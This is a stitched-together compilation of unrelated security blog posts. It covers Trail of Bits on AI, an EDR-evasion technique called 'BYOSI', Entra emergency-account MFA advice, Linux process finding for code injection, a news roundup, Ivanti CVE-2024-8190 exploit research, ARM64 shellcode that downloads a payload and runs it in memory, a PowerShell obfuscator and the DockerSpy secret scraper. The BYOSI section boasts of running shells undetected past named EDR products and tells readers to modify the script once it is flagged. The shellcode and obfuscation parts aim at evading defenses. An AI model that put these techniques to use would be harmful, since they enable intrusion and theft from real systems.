At DEF CON, Michael Brown, Principal Security Engineer at Trail of Bits, sat down with Michael Novinson from Information Security Media Group (ISMG) to discuss four critical areas where AI/ML is revolutionizing security. Here’s what they covered:
AI/ML techniques surpass the limits of traditional software analysis
As Moore’s law slows down after 20 years of increasing computational power, traditional methods for finding, analyzing, and patching bugs yield diminishing returns. However, cloud computing and GPUs enable a new class of AI/ML systems that aren’t as constrained as conventional methods. By pivoting to AI/ML or a combination of AI/ML and traditional approaches, we can make new breakthroughs.
Leverage AI/ML to solve complex security problems
When solving computing problems using conventional methods, we use a prescriptive approach—we feed the system an algorithm that then produces a solution. In contrast, AI/ML systems are descriptive; we feed them numerous examples of what is right and wrong, and they learn to solve problems through their own modeling algorithms. This is beneficial In areas where we rely on highly specialized security engineers to solve complex, ‘fuzzy’ problems, because now AI/ML can step in. This is crucial as more complex problems are on the rise, yet there isn’t enough specialized expertise to address them all, and traditional methods fall short.
Securing AI/ML systems is different than securing traditional systems
Engineers at Trail of Bits have been researching ML vulnerabilities, both data- and deployment-born, and have discovered that the vulnerabilities affecting AI/ML systems differ significantly from those in traditional software. So to secure AI/ML, we need distinct methods to avoid missing large parts of the attack surface. Therefore, it’s crucial to acknowledge these differences, treat them as such, and harden AI/ML systems early in their development to prevent costly, persistent flaws—avoiding the unnecessary mistakes that plagued early iterations of Web 2.0, mobile apps, and blockchain.
DARPA-funded projects, like AIxCC, apply AI/ML to traditional cyber issues
DARPA’s AI Grand Cyber Challenge (AIxCC) challenges teams to develop AI/ML systems that address conventional security problems. Our team’s submission, Buttercup, is one of seven finalists advancing to next year’s AIxCC finals, where it will compete on its ability to autonomously detect and patch vulnerabilities in real-world software.
Trail of Bits is at the forefront of integrating AI and ML into cybersecurity practices. Through our involvement in initiatives like the AI Cyber Challenge, we are addressing today’s security challenges while shaping the future of cybersecurity.
Reach out to us to learn more: www.trailofbits.com/contact
Evade EDR's the simple way, by not touching any of the API's they hook.
Theory
I've noticed that most EDRs fail to scan scripting files, treating them merely as text files. While this might be unfortunate for them, it's an opportunity for us to profit.
Flashy methods like residing in memory or thread injection are heavily monitored. Without a binary signed by a valid Certificate Authority, execution is nearly impossible.
Enter BYOSI (Bring Your Own Scripting Interpreter). Every scripting interpreter is signed by its creator, with each certificate being valid. Testing in a live environment revealed surprising results: a highly signatured PHP script from this repository not only ran on systems monitored by CrowdStrike and Trellix but also established an external connection without triggering any EDR detections. EDRs typically overlook script files, focusing instead on binaries for implant delivery. They're configured to detect high entropy or suspicious sections in binaries, not simple scripts.
This attack method capitalizes on that oversight for significant profit. The PowerShell script's steps mirror what a developer might do when first entering an environment. Remarkably, just four lines of PowerShell code completely evade EDR detection, with Defender/AMSI also blind to it. Adding to the effectiveness, GitHub serves as a trusted deployer.
What this script does
The PowerShell script achieves EDR/AV evasion through four simple steps (technically 3):
1.) It fetches the PHP archive for Windows and extracts it into a new directory named 'php' within 'C:\Temp'. 2.) The script then proceeds to acquire the implant PHP script or shell, saving it in the same 'C:\Temp\php' directory. 3.) Following this, it executes the implant or shell, utilizing the whitelisted PHP binary (which exempts the binary from most restrictions in place that would prevent the binary from running to begin with.)
With these actions completed, congratulations: you now have an active shell on a Crowdstrike-monitored system. What's particularly amusing is that, if my memory serves me correctly, Sentinel One is unable to scan PHP file types. So, feel free to let your imagination run wild.
Disclaimer.
I am in no way responsible for the misuse of this. This issue is a major blind spot in EDR protection, i am only bringing it to everyones attention.
Thanks Section
A big thanks to @im4x5yn74x for affectionately giving it the name BYOSI, and helping with the env to test in bringing this attack method to life.
Edit
It appears as though MS Defender is now flagging the PHP script as malicious, but still fully allowing the Powershell script full execution. so, modify the PHP script.
Edit
hello sentinel one :) might want to make sure that you are making links not embed.
Update your emergency accounts before October 15th.
Even if you have been out of office for the last couple of months, you should be aware that starting October 15th you will need to provide Multi Factor Authentication (MFA) to logon to Azure portal, Entra admin center and Intune admin center. This will be enforced to all users accessing these resources regardless of their role or permission level.
Two types of accounts are notably affected by this enforcement:
Emergency “Break the Glass” accounts.
Non-personal accounts (NPA). Meaning regular user accounts used by services or applications.
The latter will most likely be affected beginning of 2025. That is why this article will focus on Emergency accounts.
What are emergency accounts?
Microsoft recommends that you set up one or two directly assigned emergency accounts in case you lose access to your tenant for whatever reason. In general, these are the characteristics of emergency accounts:
Cloud-only accounts which do not have dependencies on on-premises services. It is customary to use the *.onmicrosoft.com domain for these accounts.
Directly assigned to the Global Administrator role.
Excluded from almost all conditional access policies.*
Not assigned to one individual.
With minimal number of dependencies, including MFA service.
In practice, this was most times achieved by creating an account with a long password which was then split into pieces and given to different people in the organisation and no MFA was configured or required for these accounts.
With Microsoft’s new MFA enforcement, you need a different approach for emergency accounts.
* We recommend creating specific conditional access policies for emergency accounts to compensate for the exclusions.
You need to enable MFA for emergency accounts by October 15th
In practice, you can choose any MFA method supported by Entra ID for your emergency accounts. But now that you are forced to do it, why not pick a long-term solution?
Phishing-resistant MFA methods are the best solution for securing your emergency accounts and still being able to use them in case of an (ahem) emergency. Other than eliminating MFA methods one by one, I will appeal to the risk-based approach: if you will have an account with direct Global Administrator access, you should protect it accordingly.
From the three phishing-resistant methods currently supported by Entra ID we recommend FIDO2 compliant keys. The reasons of this recommendation:
Microsoft Authenticator (as sign-in method) and Windows Hello for Business are linked to a specific device which will need to be maintained, updated, and (even if they fit in a safe) how will they remain charged?
Certificate authentication needs an infrastructure for the trust chain which represents an additional dependency.
FIDO2 hardware keys are the most cost-efficient solution to protect your emergency accounts.
While you are at it, why not deploy FIDO2 keys for all your administrators?
There are plenty of supported FIDO2 compliant keys available that you can use with Entra ID. Some of them require a PIN or passphrase to activate the cryptographic functions, some are unlocked by Biometrics. This is referred to as “a gesture” that activates the key, and it varies from one vendor to another.
You must be aware that, even if Entra ID now supports device-bound FIDO2 passkeys, this approach is similar to using a smartphone or Windows device which you will need to maintain and keep updated to be used for emergency access when required and, thus, not recommended.
Suggested approach
In the times when a long shared password was used, there was a group of people within the organization, the Quorum, who held the pieces of the password. This Quorum was normally composed by members of the C-Suite, IT and security management. A sub-group of these members was required to get access to the emergency accounts to mitigate the possibility of misuse.
Today, we would leverage the possibility to register multiple FIDO2 keys for one emergency account. These keys should be kept securely (in a safe, for example) and in such a way that prevents one individual from accessing them alone.
There are two viable options:
Two individuals split the combination to one physical safe that holds one FIDO2 key. Both (or even a third person) hold the “gesture” to activate the key.
One individual knows the combination of the physical safe and another knows the PIN for the FIDO2 key or has the fingerprint to activate it.
Either option will provide separation of duties. There are many possible deviations from those options, but keep in mind not to place all the responsibility in one person only.
Replicating the setup in another geography or region, will also provide redundancy in case of localized emergency. (i.e. physical safe being inaccessible, faulty FIDO2 key, etc.)
You can decide if you prefer to create only one emergency account with several FIDO2 keys assigned to it, or creating separate accounts for each location.
Ensure you register more than one FIDO2 key to each emergency account you create. It is even better to use different hardware providers to be prepared in situations like the one related to Yubikey’s recently discovered vulnerability.
Pros and Cons
The most obvious inconvenience for the suggested approach is the dependence on a physical key for emergency access. But you should register more than one key for each account, preferably, from two different vendors.
One of the advantages is the number of required emergency accounts. In the past, depending on the type of Quorum, you would need two or more accounts to be set up.
With this new approach, you can easily have only one emergency account with different keys spread in several places. Furthermore, this can be a passwordless account. In fact, it should be!
The reason to create more accounts will be related to administrative and monitoring purposes. Would you prefer to use one account per region, or only one account and monitor the IP originating the login event?
Normally, Microsoft recommends excluding at least one emergency account from conditional access policies. However, since we now know from what specific location these will be used, we can add that information to the conditional access policies aimed for emergency accounts to prevent misuse.
Creating or updating the accounts
These accounts were regularly created during “Quorum” ceremonies where the password was created jointly to ensure no one knew the whole password.
A similar approach can be used today to update them and register the FIDO2 key or keys that will be used to protect the digital identity. Bring in the members of your Quorum and follow how these keys are being registered. As part of the registration process, members should provide the “gestures” to activate the keys: PINs, biometrics or others. In this way, enough transparency will be built into the process.
Make sure you test your accounts in this setting before storing the FIDO2 keys in their safes. This is also the opportunity to test your monitoring and alerting capabilities as described below.
In fact, you should regularly test the whole procedure as part of your incident readiness exercises. And, if any of the persons who hold PINs, safe combinations, or any information related to the emergency accounts leaves the company or switch roles, you should make the necessary adjustments and take the opportunity to test for functioning access. We recommend conducting this review at least twice per year.
Monitoring
The original recommendation included setting up alerts in any login attempt using these accounts. With the recent requirement, you should also add alerts when authentication methods (MFA) are added to the account, or when sensitive activities are conducted by any of the emergency accounts.
You should only expect those alerts to be triggered when you are updating your accounts (i.e. adding new FIDO2 keys), testing them or using them in a real emergency situation.
Bear in mind that these alerts can take some time to arrive. In our experience, there is a gap of five minutes between a successful logon and the alert message.
Conclusion
Clock is ticking! You should update your emergency accounts now, assuming your human administrators are already using (phishing-resistant) MFA.
FIDO2 keys are the most affordable and effective solution to do so. Paired with a sound governance process, you should be able to face the upcoming MFA enforcement without problem.
Don’t forget that Non-personal accounts are next: Azure CLI and Powershell are scheduled to require MFA early 2025. This will potentially be a higher impact since some organizations still use “user” accounts for service or programmatic access to Entra ID and Azure.
Prepare for this upcoming requirement by identifying all of those accounts: you can leverage MFA Insights from Entra ID to identify them. Once identified, you can lay out a plan to migrate them as required (managed identity or service principal).
Victor is the solution lead for Cloud Security Engineering at NVISO. He has experience in hybrid environments with a focus on Identity and Access Management, network security and IT infrastructure.
Hello, cybersecurity enthusiasts and white hackers!
I promised to shed light on programming rootkits and other interesting and evil things when programming malware for Linux, but before we start, let’s try to do simple things. Some of my readers have no idea how to do, for example, code injections into Linux processes.
Those who have been reading me for a very long time remember such an interesting and simple example of finding the process identifier in Windows for injection purposes.
practical example
Let’s implement similar logic for Linux. Everything is very simple:
/*
* hack.c
* linux hacking part 2:
* find process ID by name
* author @cocomelonc
* https://cocomelonc.github.io/linux/2024/09/16/linux-hacking-2.html
*/#include<stdio.h>
#include<stdlib.h>
#include<string.h>
#include<dirent.h>
#include<ctype.h>intfind_process_by_name(constchar*proc_name){DIR*dir;structdirent*entry;intpid=-1;dir=opendir("/proc");if(dir==NULL){perror("opendir /proc failed");return-1;}while((entry=readdir(dir))!=NULL){if(isdigit(*entry->d_name)){charpath[512];snprintf(path,sizeof(path),"/proc/%s/comm",entry->d_name);FILE*fp=fopen(path,"r");if(fp){charcomm[512];if(fgets(comm,sizeof(comm),fp)!=NULL){// remove trailing newline from commcomm[strcspn(comm,"\r\n")]=0;if(strcmp(comm,proc_name)==0){pid=atoi(entry->d_name);fclose(fp);break;}}fclose(fp);}}}closedir(dir);returnpid;}intmain(intargc,char*argv[]){if(argc!=2){fprintf(stderr,"usage: %s <process_name>\n",argv[0]);return1;}intpid=find_process_by_name(argv[1]);if(pid!=-1){printf("found pid: %d\n",pid);}else{printf("process '%s' not found.\n",argv[1]);}return0;}
My code demonstrates how to search for a running process by its name in Linux by scanning the /proc directory. It reads the process names stored in /proc/[pid]/comm, and if it finds a match, it retrieves the process ID (PID) of the target process.
As you can see there are only two functions here. First of all, we implemented find_process_by_name function. This function is responsible for searching for the process by name within the /proc directory.
It takes a process name (proc_name) as input and returns the PID of the found process or -1 if the process is not found.
The function uses the opendir() function to open the /proc directory. This directory contains information about running processes, with each subdirectory named after a process ID (PID).
Then, iterate through entries in /proc:
while((entry=readdir(dir))!=NULL){
the readdir() function is used to iterate through all entries in the /proc directory, each entry represents either a running process (if the entry name is a number) or other system files.
Then checks whether the entry name represents a number (i.e., a process ID). Only directories named with digits are valid process directories in /proc:
if(isdigit(*entry->d_name)){
Note that, the comm file inside each /proc/[pid] directory contains the name of the executable associated with that process:
that means, we constructs the full path to the comm file by combining /proc/, the process ID (d_name), and /comm.
Finally, we open comm file, read process name and compare it:
FILE*fp=fopen(path,"r");if(fp){charcomm[512];if(fgets(comm,sizeof(comm),fp)!=NULL){// remove trailing newline from commcomm[strcspn(comm,"\r\n")]=0;if(strcmp(comm,proc_name)==0){pid=atoi(entry->d_name);fclose(fp);break;}}
Then, of course, close the directory and return.
The second function is the main function:
intmain(intargc,char*argv[]){if(argc!=2){fprintf(stderr,"usage: %s <process_name>\n",argv[0]);return1;}intpid=find_process_by_name(argv[1]);if(pid!=-1){printf("found pid: %d\n",pid);}else{printf("process '%s' not found.\n",argv[1]);}return0;}
Just check command-line args and run process finding logic.
demo
Let’s check everything in action. Compile it:
gcc -z execstack hack.c -o hack
Then run it in linux machine:
.\hack [process_name]
As you can see, everything is wokred perfectly. We found Telegram ID (75678) in my case! =^..^=
It all seems very easy, doesn’t it?
But there is a caveat. If we try to run it for processes like firefox in my example:
.\hack firefox
we got:
The issue we’re facing may stem from the fact that some processes, like firefox, might spawn child processes or multiple threads, which might not all use the comm file to store their process name.
The /proc/[pid]/comm file stores the executable name without the full path and may not reflect all instances of the process, especially if there are multiple threads or subprocesses under the same parent.
So possible issues in my opinion are:
different process names in /proc/[pid]/comm: child processes or threads could use different naming conventions or might not be listed under /proc/[pid]/comm as firefox.
zombies or orphan processes: some processes might not show up correctly if they are in a zombie or orphaned state.
practical example 2
Instead of reading the comm file, we can check the /proc/[pid]/cmdline file, which contains the full command used to start the process (including the process name, full path, and arguments). This file is more reliable for processes that spawn multiple instances like firefox.
For this reason I just created another version (hack2.c):
/*
* hack2.c
* linux hacking part 2:
* find processes ID by name
* author @cocomelonc
* https://cocomelonc.github.io/linux/2024/09/16/linux-hacking-2.html
*/#include<stdio.h>
#include<stdlib.h>
#include<string.h>
#include<dirent.h>
#include<ctype.h>voidfind_processes_by_name(constchar*proc_name){DIR*dir;structdirent*entry;intfound=0;dir=opendir("/proc");if(dir==NULL){perror("opendir /proc failed");return;}while((entry=readdir(dir))!=NULL){if(isdigit(*entry->d_name)){charpath[512];snprintf(path,sizeof(path),"/proc/%s/cmdline",entry->d_name);FILE*fp=fopen(path,"r");if(fp){charcmdline[512];if(fgets(cmdline,sizeof(cmdline),fp)!=NULL){// command line arguments are separated by '\0', we only need the first argument (the program name)cmdline[strcspn(cmdline,"\0")]=0;// perform case-insensitive comparison of the base process nameconstchar*base_name=strrchr(cmdline,'/');base_name=base_name?base_name+1:cmdline;if(strcasecmp(base_name,proc_name)==0){printf("found process: %s with PID: %s\n",base_name,entry->d_name);found=1;}}fclose(fp);}}}if(!found){printf("no processes found with the name '%s'.\n",proc_name);}closedir(dir);}intmain(intargc,char*argv[]){if(argc!=2){fprintf(stderr,"usage: %s <process_name>\n",argv[0]);return1;}find_processes_by_name(argv[1]);return0;}
As you can see, this is an updated version of the code that reads from /proc/[pid]/cmdline instead.
But the file /proc/[pid]/cmdline or /proc/[pid]/status may not always show all subprocesses or threads correctly.
demo 2
Let’s check second example in action. Compile it:
gcc -z execstack hack2.c -o hack2
Then run it in linux machine:
.\hack [process_name]
As you can see, it’s correct.
I hope this post with practical example is useful for malware researchers, linux programmers and everyone who interested on linux kernel programming and code injection techniques.
Last Week in Security is a summary of the interesting cybersecurity news, techniques, tools and exploits from the past week. This post covers 2024-09-09 to 2024-09-16.
News
[X] Activation Lock for iPhone components - iOS 18 will lock replaceable components of an iPhone to the iCloud account, making the steal-and-part-out pipeline much more difficult. Thieves would have to phish the phone's original owner, or defeat the activation lock on each component when parting out the phone. Apple is making iPhones less attractive to steal with each release.
Bug Left Some Windows PCs Dangerously Unpatched - "Build version numbers crossed into a range that triggered a code defect." The build system for Windows and Windows Updates must be a wild place.
We Spent $20 To Achieve RCE And Accidentally Became The Admins Of .MOBI - This is worth a careful read. An expired domain leads to complete chaos, from RCE to TLS certificates for any .mobi domain. A post that makes you wonder how we've gotten this far with the underlying infrastructure of the internet.
Defend Against Vampires With 10 Gbps Network Encryption - If your fiber transits uncontrolled spaces (or even if it doesn't), you can use WireGuard and Linux routers on either end to encrypt all trunk'd VLAN traffic with almost no overhead when tuned properly.
Microsoft Windows MSI Installer - Repair to SYSTEM - A detailed journey - Until the September 2024 patch Tuesday, you could use some Windows MSI installers to escalate to SYSTEM during a "repair." SEC Consult released msiscan a scanning tool for identifying local privilege escalation issues in vulnerable MSI installers, as well as a few Yara rules with the post.
Hijacking SQL Server Credentials using Agent Jobs for Domain Privilege Escalation - "In this blog I'll introduce SQL Server credential objects and discuss how they can be abused by threat actors to execute code as either a SQL Server login, local Windows user, or Domain user. I'll also cover how to enable logging that can be used to detect the associated behavior. This should be interesting to penetration testers, red teamers, and DBAs looking for legitimate authentication work arounds."
Living off the land, GPO style - "The ability to edit Group Policy Object (GPOs) from non-domain joined computers using the native Group Policy editor has been on my list for a long time. This blog post takes a deep dive into what steps were taken to find out why domain joined machines are needed in the first place and what options we had to trick the Group Policy Manager MMC snap-in into believing the computer was domain joined."
DGPOEdit - Disconnected GPO Editor - A Group Policy Manager launcher to allow editing of domain GPOs from non-domain joined machines.
BEAR - Bear C2 is a compilation of C2 scripts, payloads, and stagers used in simulated attacks by Russian APT groups, Bear features a variety of encryption methods, including AES, XOR, DES, TLS, RC4, RSA and ChaCha to secure communication between the payload and the operator machine.
EXE-or-DLL-or-ShellCode - Just a simple silly PoC demonstrating executable "exe" file that can be used like exe, dll or shellcode...
alpt4ats - A Lazy Programmer's Tips for Avoiding the SOC ~ BSides Belfast 2024.
New to Me and Miscellaneous
This section is for news, techniques, write-ups, tools, and off-topic items that weren't released last week but are new to me. Perhaps you missed them too!
Today on Cyber Work Hacks, my guest, Infosec Skills author Cicero Chimbanda, gives us another Hack for our Cybersecurity Managers. If you want to know more about Cicero’s Security Manager learning path for Infosec Skills, this is the episode for you, as we break down everything you’ll learn and how to apply it to your career!
0:00 - Infosec's security manager soft skills course 2:39 - Infosec Skills soft skills learning modules 5:30 - Why cybersecurity management soft skills are important 7:30 - Benefits from learning cybersecurity soft skills 10:52 - Outro
About Infosec Infosec’s mission is to put people at the center of cybersecurity. We help IT and security professionals advance their careers with skills development and certifications while empowering all employees with security awareness and phishing training to stay cyber-safe at work and home. More than 70% of the Fortune 500 have relied on Infosec Skills to develop their security talent, and more than 5 million learners worldwide are more cyber-resilient from Infosec IQ’s security awareness training. Learn more at infosecinstitute.com.
On September 10, 2024, Ivanti released a security advisory for a command injection vulnerability for it’s Cloud Service Appliance (CSA) product. Initially, this CVE-2024-8190 seemed uninteresting to us given that Ivanti stated that it was an authenticated vulnerability. Shortly after on September 13, 2024, the vulnerability was added to CISA’s Known Exploited Vulnerabilities (KEV). Given it was now exploited in the wild we decided to take a look.
The advisory reads:
Ivanti has released a security update for Ivanti CSA 4.6 which addresses a high severity vulnerability. Successful exploitation could lead to unauthorized access to the device running the CSA. Dual-homed CSA configurations with ETH-0 as an internal network, as recommended by Ivanti, are at a significantly reduced risk of exploitation.
An OS command injection vulnerability in Ivanti Cloud Services Appliance versions 4.6 Patch 518 and before allows a remote authenticated attacker to obtain remote code execution. The attacker must have admin level privileges to exploit this vulnerability.
The description definitely sounds like it may have the opportunity for accidental exposure given the details around misconfigurations of the external versus internal interfaces.
Cracking It Open
Inspecting the patches, we find that the Cloud Service Appliance has a PHP frontend and the patch simply copies in newer PHP files.
Inspecting the 4 new PHP files, we land on DateTimeTab.php which has more interesting changes related to validation of the zone variable right before a call to exec().
Figure 2. Validating the zone variable
Now that we have a function of interest we trace execution to it. We find that handleDateTimeSubmit() calls our vulnerable function on line 153.
We see that the function takes the request argument TIMEZONE and passes it directly to the vulnerable function, which previously had no input validation before calling exec with our input formatted to a string.
Developing the Exploit
We find that the PHP endpoint /datetime.php maps to the handleDateTimeSubmit() function, and is accessible only from the “internal” interface with authentication.
Putting together the pieces, we’re able to achieve command injection by supplying the application username and password. Our proof of concept can be found here.
N-Day Research – also known as CVSS Quality Assurance
It seems that Ivanti is correct in marking that this is an authenticated vulnerability. But lets take a look at their configuration guidance to understand what may have went wrong for some of their clients being exploited in the wild.
Ivanti’s guidance about ensuring that eth0 is configured as the internal network interface tracks with what we’ve found. When attempting to reach the administrative portal from eth1, we find that we receive a 403 Forbidden instead of a 401 Unauthorized.
Users that accidentally swap the interfaces, or simply only have one interface configured, would expose the console to the internet.
If exposed to the internet, we found that there was no form of rate limiting in attempting username and password combinations. While the appliance does ship with a default credential of admin:admin, this credential is force updated to stronger user-supplied password upon first login.
We theorize that most likely users who have been exploited have never logged in to the appliance, or due to lack of rate limiting may have had poor password hygiene and had weaker passwords.
Indicators of Compromise
We found sparse logs, but in /var/log/messages we found that an incorrect login looked like the following messages – specifically key in on “User admin does not authenticate”.
Back in October 2018, I wanted to write ARM assembly on Windows. All I could acquire then was a Surface tablet running Windows RT that was released sometime in October 2012. Windows RT (now deprecated) was a version of Windows 8 designed to run on the 32-Bit ARMv7 architecture. By the summer of 2013, it was considered to be a commercial flop.
For developers, it was possible to compile binaries on a separate machine and get them running on the tablet via USB stick or network, but unless you wanted to obtain a developer license, a jailbreak exploit was required. Since there were too many limitations, my attention shifted towards Linux on a Raspberry Pi4.
From what I read, the release of Windows 10 for ARMv7 in 2015 was a distinct improvement over Windows RT. Limitations for developers persisted but at least Microsoft provided support for emulating x86 applications. Today, I finally have an ARM64 device running Windows 11 without all the problems that plagued previous versions. There’s full native support for developers with Visual Studio 2022 and a Linux subsystem that can run Ubuntu or Debian if you want to program ARM64 applications for Linux. (I know WSL isn’t new, but still). Best of all perhaps is the ability to emulate both 32-bit and 64-bit applications for the x86 architecture.
Toolchain
To support Windows on ARM, you have at least three options:
MSVC and LLVM-MinGW are best for C/C++. And I prefer the GNU Assembler (as) over the ARM Macro Assembler (armasm64) shipped by Microsoft, but the main problem with both is the lack of support for macros. armasm64 supports most of the directives documented by ARM, but appears to have limitations. From what I can tell, ARMASM has no support for structures making it very difficult to write programs in assembly. This is also a problem with the GNU Assembler and the only way around it is to use symbolic names with the hardcoded offset of each field.
There is some hope. Despite having no direct support for the ARM architecture, flat assembler g (FASMG) by Tomasz Grysztar is an adaptable assembly engine that “has the ability to become an assembler for any CPU architecture.”. There are include files for fasmg which implement ARM64 instructions using macros and it’s what I decided to use for a simple PoC in this post.
Once you setup FASMG, copy the AARCH64 macros from asmFish to the include directory. My own batch file that I execute from a command prompt inside the root directory of fasm looks like this:
@echo off
set include=C:\fasmw\fasmg\packages\utility;C:\fasmw\fasmg\packages\x86\include
set path=%PATH%;C:\fasmw\fasmg\core
Windows uses the same as what’s used on Linux for subroutines. However, invocation of system calls are different: Linux uses x8 to hold system call ID whereas Windows embeds the ID in the SVC instruction.
Register
Volatile?
Role
x0
Yes
Parameter/scratch register 1, result register
x1-x7
Yes
Parameter/scratch register 2-8
x8-x15
Yes
Scratch registers. Used as parameter too.
x16-x17
Yes
Intra-procedure-call scratch registers
x18
No
Platform register: in kernel mode, points to KPCR for the current processor; in user mode, points to TEB
x19-x28
No
Scratch register
x29/fp
No
Frame pointer
x30/lr
No
Link register
x31/zxr
No
Zero register
Hello, World! (Console)
Initially, I started working with ARMASM, so the following is just an example of how to create a simple console application.
; armasm64 hello.asm -ohello.obj; cl hello.obj /link /subsystem:console /entry:start kernel32.lib
AREA .drectve, DRECTVE
; invoke API without repeating the same instructions; p1 should be the number of register available to load address of APIMACROINVOKE $p1, $p2 ; name of macro followed by number of parameters
adrp $p1, __imp_$p2
ldr $p1,[$p1, __imp_$p2]
blr $p1
MEND
; saves time typing "__imp_" for each API importedMACRO
IMPORT_API $p1
IMPORT __imp_$p1
MEND
AREA data,DATA
Text DCB "Hello, World!\n"; symbolic constants for clarity
NULL equ0
STD_OUTPUT_HANDLE equ-11; the entrypointEXPORT start
; the API used
IMPORT_API ExitProcess
IMPORT_API WriteFile
IMPORT_API GetStdHandle
; start of code to execute
AREA text,CODE
start PROCmov x0, STD_OUTPUT_HANDLE
INVOKE x1, GetStdHandle
mov x4, NULL
mov x3, NULL
mov x2,14; string length...
adr x1,Text
INVOKE x5, WriteFile
mov x0, NULL
INVOKE x1, ExitProcess
ENDPEND
And a simple GUI. A version for FASMG can be found here.
Hello, World! (GUI)
; armasm64 msgbox.asm -omsgbox.obj; cl msgbox.obj /link /subsystem:windows /entry:start kernel32.lib user32.lib
AREA .drectve, DRECTVE
; invoke API without repeating the same instructions; p1 should be the free register available to load address of APIMACROINVOKE $p1, $p2
adrp $p1, __imp_$p2
ldr $p1,[$p1, __imp_$p2]
blr $p1
MEND
; saves time typing "__imp_" for each API importedMACRO
IMPORT_API $p1
IMPORT __imp_$p1
MEND
AREA data,DATA
Text DCB "Hello, World!",0x0
Caption DCB "Hello from ARM64",0x0; symbolic names for clarity
NULL equ0; the entrypointEXPORT start
; the API used
IMPORT_API ExitProcess
IMPORT_API MessageBoxA
; start of code to execute
AREA text,CODE
start PROCmov x3,NULL
adr x2,Caption
adr x1,Text
mov x0,NULL
INVOKE x4, MessageBoxA
mov x0, NULL
INVOKE x1, ExitProcess
ENDPEND
The shellcode uses the IStream object to read data from the HTTP request. FASMG provides macros to declare an interface. There’s also comcall and cominvk macros to invoke interface methods. I decided not to use them here. As pointed out before in relation to executing .NET assemblies, interfaces are just structures with function pointers.
The most powerful feature of FASMG is its support for macros. It’s possible to implement cryptographic hashes like SHA256, SHA512 and SHA3 purely with macros. The following doesn’t demonstrate the full potential of FASMG at all.
macro hash_api dll_name, api_name
local dll_hash, api_hash, b
; DLL
virtual at 0
db dll_name
dll_hash = 0
repeat $
load b byte from % - 1
dll_hash = (dll_hash + b) and 0xFFFFFFFF
dll_hash = ((dll_hash shr 8) and 0xFFFFFFFF) or ((dll_hash shl 24) and 0xFFFFFFFF)
end repeat
end virtual
; API
virtual at 0
db api_name
api_hash = 0
repeat $
load b byte from % - 1
api_hash = (api_hash + b) and 0xFFFFFFFF
api_hash = ((api_hash shr 8) and 0xFFFFFFFF) or ((api_hash shl 24) and 0xFFFFFFFF)
end repeat
end virtual
dd (dll_hash + api_hash) and 0xFFFFFFFF
end macro
Thread Environment Block
xpr is an alias for the x18 register. As noted in the table of integer registers, it contains a pointer to the TEB for user-mode applications. Every offset used by AMD64 can probably be used for ARM64. However, it would be safer check debugging symbols.
System Calls
For x86, the syscall number is placed in the accumulator (EAX/RAX) but for ARM64, it’s embedded in the SVC opcode itself and there appears to be no alternative. (at least not that I’m aware of). To build a new stub would require using NtAllocateVirtualMemory and manually encoding the instruction.
HTTP Download
The following code uses URLOpenBlockingStream to download a shellcode and execute in memory.
Tool for obfuscating PowerShell scripts written in Go. The main objective of this program is to obfuscate PowerShell code to make its analysis and detection more difficult. The script offers 5 levels of obfuscation, from basic obfuscation to script fragmentation. This allows users to tailor the obfuscation level to their specific needs.
Usage: ./obfuscator -i <inputFile> -o <outputFile> -level <1|2|3|4|5> Options: -i string Name of the PowerShell script file. -level int Obfuscation level (1 to 5). (default 1) -o string Name of the output file for the obfuscated script. (default "obfuscated.ps1")
Obfuscation levels: 1: Basic obfuscation by splitting the script into individual characters. 2: Base64 encoding of the script. 3: Alternative Base64 encoding with a different PowerShell decoding method. 4: Compression and Base64 encoding of the script will be decoded and decompressed at runtime. 5: Fragmentation of the script into multiple parts and reconstruction at runtime.
Features:
Obfuscation Levels: Four levels of obfuscation, each more complex than the previous one.
Level 1 obfuscation by splitting the script into individual characters.
Level 2 Base64 encoding of the script.
Level 3 Alternative Base64 encoding with a different PowerShell decoding method.
Level 4 Compression and Base64 encoding of the script will be decoded and decompressed at runtime.
Level 5 Fragmentation of the script into multiple parts and reconstruction at runtime.
Compression and Encoding: Level 4 includes script compression before encoding it in base64.
Variable Obfuscation: A function was added to obfuscate the names of variables in the PowerShell script.
Random String Generation: Random strings are generated for variable name obfuscation.
Install
go install github.com/TaurusOmar/psobf@latest
Example of Obfuscation Levels
The obfuscation levels are divided into 5 options. First, you need to have a PowerShell file that you want to obfuscate. Let's assume you have a file named script.ps1 with the following content:
This will generate a file named obfuscated_level1.ps1 with the obfuscated content. The result will be a version of your script where each character is separated by commas and combined at runtime. Result (level 1)
This will generate a file named obfuscated_level2.ps1 with the content encoded in base64. When executing this script, it will be decoded and run at runtime. Result (level 2)
This level compresses the script before encoding it in base64, making analysis more complicated. The result will be decoded and decompressed at runtime. Result (level 4)
Many native OS PE files still rely on delayed imports. When APIs imported this way are called for the first time, a so-called delay load helper function is executed first – it loads the actual delayed library, resolves the address … Continue reading →
DockerSpy searches for images on Docker Hub and extracts sensitive information such as authentication secrets, private keys, and more.
What is Docker?
Docker is an open-source platform that automates the deployment, scaling, and management of applications using containerization technology. Containers allow developers to package an application and its dependencies into a single, portable unit that can run consistently across various computing environments. Docker simplifies the development and deployment process by ensuring that applications run the same way regardless of where they are deployed.
About Docker Hub
Docker Hub is a cloud-based repository where developers can store, share, and distribute container images. It serves as the largest library of container images, providing access to both official images created by Docker and community-contributed images. Docker Hub enables developers to easily find, download, and deploy pre-built images, facilitating rapid application development and deployment.
Why OSINT on Docker Hub?
Open Source Intelligence (OSINT) on Docker Hub involves using publicly available information to gather insights and data from container images and repositories hosted on Docker Hub. This is particularly important for identifying exposed secrets for several reasons:
Security Audits: By analyzing Docker images, organizations can uncover exposed secrets such as API keys, authentication tokens, and private keys that might have been inadvertently included. This helps in mitigating potential security risks.
Incident Prevention: Proactively searching for exposed secrets in Docker images can prevent security breaches before they happen, protecting sensitive information and maintaining the integrity of applications.
Compliance: Ensuring that container images do not expose secrets is crucial for meeting regulatory and organizational security standards. OSINT helps verify that no sensitive information is unintentionally disclosed.
Vulnerability Assessment: Identifying exposed secrets as part of regular security assessments allows organizations to address these vulnerabilities promptly, reducing the risk of exploitation by malicious actors.
Enhanced Security Posture: Continuously monitoring Docker Hub for exposed secrets strengthens an organization's overall security posture, making it more resilient against potential threats.
Utilizing OSINT on Docker Hub to find exposed secrets enables organizations to enhance their security measures, prevent data breaches, and ensure the confidentiality of sensitive information within their containerized applications.
DockerSpy is intended for educational and research purposes only. Users are responsible for ensuring that their use of this tool complies with applicable laws and regulations.
Contribution
Contributions to DockerSpy are welcome! Feel free to submit issues, feature requests, or pull requests to help improve this tool.
About the Author
DockerSpy is developed and maintained by Alisson Moretto (UndeadSec)
